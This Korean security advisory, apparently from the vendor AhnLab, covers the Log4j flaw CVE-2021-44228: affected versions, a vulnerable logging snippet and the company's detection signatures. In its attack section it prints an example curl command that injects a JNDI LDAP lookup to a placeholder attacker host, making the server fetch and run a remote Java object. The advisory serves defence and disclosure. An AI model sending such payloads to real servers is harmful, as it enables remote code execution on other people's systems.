지난 2021년 12월 10일 Apache Log4j 취약점(CVE-2021-44228)이 공개됨에 따라 Github에 다양한 POC가 업로드되었다. Log4j 취약점은 공격자가 로그 메시지에 악성 클래스 주소를 삽입하여 웹서버에 공격자가 제작한 악성 클래스를 실행 시킬 수 있어 파급력이 크다.
안랩에서는 Log4j 취약점 공격을 탐지하기 위해 네트워크 차단 시그니처를 업데이트 하였으며 아래에서 Log4j 취약점 설명 및 V3 제품 탐지 영상을 공개한다.
1. 취약점 대상 및 버전
다음의 조건들의 제품들은 해당 취약점의 영향을 받는다.
- Apache Log4j 2.0-beta9 ~ 2.12.1 및 2.13.0 ~ 2.15.0 버전
- Apache Log4j 1.2.x의 모든 버전
2. 취약점 공격 방법
Log4j 를 이용하는 서비스에서 user-agent 로 전송된 문자열을 로그로 기록하는 코드가 포함된 경우 다음과 같이 공격할 수 있다.
[서버 소스 코드 일부]
static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());
...
String userAgent = he.getRequestHeader("user-agent");
String response = "<h1>Hello There, " + userAgent + "!</h1>";
log.error("Request User Agent:{}", userAgent);
...
[취약점 공격]
xxx.xxx.xxx.xxx/a 에 위치한 자바 객체를 자동으로 서버에서 실행 시키는 공격
ex) # curl 127.0.0.1:8080 -H “X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}”
3. 안랩 제품 대응
현재 안랩에서는 V3 및 TG/IPX, AIPS, HIPS 제품을 통해서도 해당 취약점 탐지가 가능하다. 다만 V3 제품의 경우 네트워크 침입 차단 옵션을 활성화해야만 탐지가 가능하기 때문에 log4j 취약점 예방을 위해서 가급적 네트워크 침입 차단 사용을 권장한다.

- Apache_Log4j_JndiManager_JNDI_Injection-1(CVE-2021-44228) (V3 엔진버전 : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-2(CVE-2021-44228) (V3 엔진버전 : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-3(CVE-2021-44228) (V3 엔진버전 : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-4(CVE-2021-44228) (V3 엔진버전 : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-5(CVE-2021-44228) (V3 엔진버전 : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-6(CVE-2021-44228) (V3 엔진버전 : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-7(CVE-2021-44228) (V3 엔진버전 : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-8(CVE-2021-44228) (V3 엔진버전 : 2021.12.22.03)

아래 영상은 Log4j 취약점(CVE-2021-44228)을 V3 기업용 유료제품에서 네트워크 차단 기능으로 탐지 및 차단하는 영상이다.
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보